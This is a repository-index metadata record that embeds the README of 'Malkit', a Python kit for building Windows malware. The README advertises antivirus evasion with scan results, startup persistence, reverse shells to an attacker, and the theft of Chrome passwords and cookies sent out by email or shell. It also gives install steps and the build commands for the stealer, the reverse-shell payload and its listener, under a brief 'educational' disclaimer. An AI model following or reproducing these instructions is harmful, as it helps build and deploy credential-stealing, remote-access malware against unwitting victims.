{"id":16776288,"url":"https://github.com/darkarp/malkit","last_synced_at":"2025-03-22T00:30:57.521Z","repository":{"id":104382277,"uuid":"225593778","full_name":"darkarp/malkit","owner":"darkarp","description":"Full malware Kit","archived":false,"fork":false,"pushed_at":"2021-03-18T09:16:51.000Z","size":581,"stargazers_count":57,"open_issues_count":3,"forks_count":10,"subscribers_count":11,"default_branch":"master","last_synced_at":"2025-03-18T06:22:53.387Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/darkarp.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2019-12-03T10:34:23.000Z","updated_at":"2024-09-21T18:16:47.000Z","dependencies_parsed_at":null,"dependency_job_id":"664007da-0a75-4d7a-bd14-452d21178d28","html_url":"https://github.com/darkarp/malkit","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fmalkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fmalkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fmalkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/darkarp%2Fmalkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/darkarp","download_url":"https://codeload.github.com/darkarp/malkit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244890102,"owners_count":20527030,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-13T07:09:27.449Z","updated_at":"2025-03-22T00:30:57.160Z","avatar_url":"https://github.com/darkarp.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align='center'\u003eMalkit - Full malware kit\u003c/h1\u003e\n\u003cp align=\"center\"\u003e\t\n    \u003cimg src=\"https://img.shields.io/badge/Platform-Windows-green?style=plastic\" /\u003e\n\t\u003ca href=\"https://github.com/darkarp/malkit/releases/latest?style=plastic\"\u003e\n\t\u003cimg src=\"https://img.shields.io/github/v/release/darkarp/malkit?style=plastic\" alt=\"Release\" /\u003e\n\t\u003c/a\u003e\n    \u003cimg src=\"https://img.shields.io/badge/build-passing-green?style=plastic\" alt=\"Build Status on CircleCI\" /\u003e\n    \u003cimg src=\"https://img.shields.io/maintenance/yes/2021\" /\u003e\n\t\u003c/br\u003e\n  \n  \u003ca href=\"https://github.com/darkarp/malkit/commits/master\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/last-commit/darkarp/malkit?style=plastic\" /\u003e\n  \u003c/a\u003e\n  \u003cimg alt=\"Scrutinizer code quality (GitHub/Bitbucket)\" src=\"https://img.shields.io/scrutinizer/quality/g/darkarp/malkit?style=flat\"\u003e\n\n\n  \u003ca href=\"https://github.com/darkarp/malkit/blob/master/LICENSE\"\u003e\n    \u003cimg src=\"https://img.shields.io/github/license/darkarp/malkit?style=plastic\" /\u003e\n  \u003c/a\u003e\n\n\n  \u003c/br\u003e\n\n  \u003ca href=\"https://github.com/darkarp/malkit/issues?q=is%3Aopen+is%3Aissue\"\u003e\n\t\u003cimg alt=\"GitHub issues\" src=\"https://img.shields.io/github/issues/darkarp/malkit?style=plastic\"\u003e\n\u003c/a\u003e\n\n\u003ca href=\"https://github.com/darkarp/malkit/issues?q=is%3Aissue+is%3Aclosed\"\u003e\n\t\u003cimg alt=\"GitHub closed issues\" src=\"https://img.shields.io/github/issues-closed/darkarp/malkit\"\u003e\n\u003c/a\u003e\n\u003c/br\u003e\n  \u003ca href=\"https://discord.gg/beczNYP\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/discord-join-7289DA.svg?logo=discord\u0026longCache=true\u0026style=flat\" /\u003e\n  \u003c/a\u003e\n  \u003c/br\u003e\n    \u003ca href=\"https://github.com/darkarp/chromepass/issues/new?assignees=\u0026labels=\u0026template=bug_report.md\u0026title=\"\u003eReport Bug\u003c/a\u003e\n    ·\n    \u003ca href=\"https://github.com/darkarp/chromepass/issues/new?assignees=\u0026labels=\u0026template=feature_request.md\u0026title=\"\u003eRequest Feature\u003c/a\u003e\n  \u003c/p\u003e  \n  \n  \n\u003c!-- TABLE OF CONTENTS --\u003e\n## Table of Contents\n\n* [About the Project](#about-the-project)  \n\t* [AV Detection](#av-detection)\n* [Getting started](#getting-started)\n  * [Prerequisites](#dependencies-and-requirements)\n  * [Installation](#installation)\n* [Usage](#usage)\n* [Todo](#todo)\n* [Errors, Bugs and Feature Requests](#errors-bugs-and-feature-requests)\n* [Learn More](#learn-more)\n* [License](#license)\n\n## About The project\nMalkit is a python-based console application that generates runtime-decrypted undetectable windows executables.\nIt has the following features:\n  - Copying itself into startup as a legitimate application\n  - Connecting back to an attacker via reverse shell\n  - Custom listener with upload, download and modular capability (in progress)\n  - Chromepass feature:\n    - Decrypt Chrome saved paswords ad well as all cookies\n    - Send a file with the login/password combinations remotely (email or reverse shell)\n    - Send a file with all the extracted cookies as well as another file with possible email-related cookies\n    - Custom icon\n    - Custom error message\n  - Accurate location reporting. It can detect and send back a victim's accurate geolocation (not ip-based) (X)\n  - Easy to use\n  - Completely undetectable by AV engines\n\nFeatures marked with an X are still in development and aren't fully working but are already complete in internal testing.\n### AV Detection!\nDue to the way this has been coded, it is currently fully undetected. Here are some links to scans performed\n  - [From build_malware](https://www.virustotal.com/gui/file/61fc9c4ad472a240f4fd010958a0b0210f6513ed878bd47b90e25da871e52068/detection) \n  - [From build_chromepass](https://antiscan.me/scan/new/result?id=kmpsMNccfuRJ)\n  - Both scans yielded the result: 1/69 detections. The sole detection is a false positive by Sangfor Engine Zero. I tried submitting a simple hello world program for analysis and the same AV detected it as malware as well.\n  - This is an educational project first and foremost, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal\n\n## Getting started\n\n### Dependencies and Requirements\n\nFor this application you need:\n\n* [Python] - Only tested on 3.7.5 on Anaconda environment but should work in 3.6+ (Doesn't work in 3.8 yet). No need to download it from here, just follow [Installation below](#installation)\n* ~~[VS build tools] - This is required to build some requirements. Please download it, install it and restart your computer **BEFORE** proceding to [Installation](#installation)~~ No longer needed due to last update. However, should you not be able to install the `requirements.txt`, open the file and downgrade `pexe37` to `0.9.6.4` and `darkarp` to `3.4` (ONLY if you get errors when installing the  `requirements.txt`. For now, just go to [Installation](#installation) )\n\n### Installation\n\nChromepass requires [Python] 3.6+ to run.\nIt has been tested on a full anaconda installation but it doesn't necessariliy require it. It doesn't work with Python 3.8 yet\nThe instructions on the full setup are below.\n\n**Setup Anaconda environment:**\n  - Visit [Anaconda](https://www.anaconda.com/distribution/#download-section) and download the graphical installer for windows.\n  - Run the installer and make sure you select the checkbox \"Add conda to path\", even though it isn't recommended.\n  - Open up a **new** powershell window **as administrator** and run:\n    - `Set-ExecutionPolicy RemoteSigned`\n    - Press `A` when it prompts you.\n    - Close this window\n  - Open up a normal powershell and enable conda to use it:\n    - `conda init powershell`\n  - Close and open a new powershell and update conda:\n     - `conda update conda`\n  - Create a new anaconda environment:\n    - `conda create -n malkit python=3.7`\n  - Activate your environment:\n    - `conda activate malkit`\n    - Note: Every time you open a new powershell and want to run malkit you need to activate your environment.  \n\n\n**Clone the Repository and access its directory:**\n```powershell\n\u003e git clone https://github.com/darkarp/malkit.git\n\u003e cd malkit\n```  \n\n**Install the dependencies:**\n\n```powershell\n\u003e pip install -r requirements.txt\n```\n\nIf any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+ \u003c 3.8 (preferably 3.7.5).\nIf the errors persist, try:\n```powershell\n\u003e python -m pip install --upgrade pip\n\u003e python -m pip install -r requirements.txt\n```  \nIf any errors **still** persist, make sure you have the following installed:  \n* [VS build tools]\n  \n\n\n## Usage\n\n* Show the help screen\n    - `python malkit.py -h`\n\n```\nusage: python malkit.py [-h] {build_listener, build_malware, build_chromepass} ...\n\npositional arguments:\n  {build_listener, build_malware, build_chromepass}\n\noptional arguments:\n  -h, --help            show this help message and exit\n\n```  \n* Access the help menu for individual arguments\n    - `python malkit.py build_chromepass -h`\n\n```\nusage: python malkit.py build_chromepass [-h] [--load] [--email] [--reverse_shell]\n                                  [--no_error]\n                                  [--errormsg Error message to appear]\n                                  [--address Email address to send details to, if Email was chosen]\n                                  [--port Port for reverse connection, if Reverse shell was chosen.]\n                                  [--host Host reverse connection, if Reverse shell was chosen.]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --load\n  --email\n  --reverse_shell\n  --no_error\n  --errormsg Error message to appear\n  --address Email address to send details to, if Email was chosen\n  --port Port for reverse connection, if Reverse shell was chosen.\n  --host Host reverse connection, if Reverse shell was chosen.\n\nexample:\n\n python malkit.py build_chromepass --email --address myemail@gmail.com\n python malkit.py build_chromepass --reverse_shell --host 127.0.0.1 -p 4444\n python malkit.py build_chromepass --load myfile.conf\n ```  \n \n\n * Building an executable that grabs and sends chrome-saved passwords through email\n    - `python malkit.py build_chromepass --email --address youremailaddress@yourdomain.com`  \n\n * Creating a persistent reverse_shell with additional features\n    - `python malkit.py build_malware --host 127.0.0.1 -p 444`\n    - Replace the host with your external/internal ip as needed\n    - Replace the port as needed\n    - Make sure you build the listener as well and run it.  \n \n * Creating a listener for the malware\n    - `python malkit.py build_listener -p 444`\n    - This is the listener for the malware\n    - While in the shell, you can use the `list` command to see active sessions.\n    - You can interact with a session by using the command: `interact::SESSION_NUMBER` where `SESSION_NUMBER` is the number of the session you want to connect with. \n    - To go back into listener mode after interacting with a session, use the command `\u003cbg` or `\u003cbackground`\n    - Other commands while interacting have been added but still experimental:\n      - `\u003cdownload` - Downloads a file from the server\n\n\n## Todo\n - Reducing `malware` file size to around 4-6 MB, possible by making the original `malware` download the rest of the payload via the reverse connection.\n - Sending Real-time precise location of the victim (***completed, releases next update***)\n - Also steal Firefox passwords (***Completed, releases next update***)\n - Also steal passwords from other programs, such as keychains(***in progress***)\n - Better encryption (***Completed, releases into beta version***)\n   \n## Errors, Bugs and feature requests\n\nIf you find an error or a bug, please report it as an issue.\nIf you wish to suggest a feature or an improvement please report it in the issue pages.\n\nPlease follow the templates shown when creating the issue.\n\n## Learn More\n\nFor access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran,\njoin our Discord Server: [WhiteHat Hacking](https://discord.gg/beczNYP)\n\nIf you wish to contact me, you can do so via: marionascimento@itsec.bz\n\n## Disclaimer\nI am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.\n\n## License\n\u003ca href=\"https://github.com/darkarp/malkit/blob/master/LICENSE\"\u003e MIT \u003c/a\u003e\n   \n[Python]: \u003chttps://www.anaconda.com/distribution/#download-section\u003e\n[VS build tools]: \u003chttps://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools\u0026rel=16\u003e\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdarkarp%2Fmalkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdarkarp%2Fmalkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdarkarp%2Fmalkit/lists"}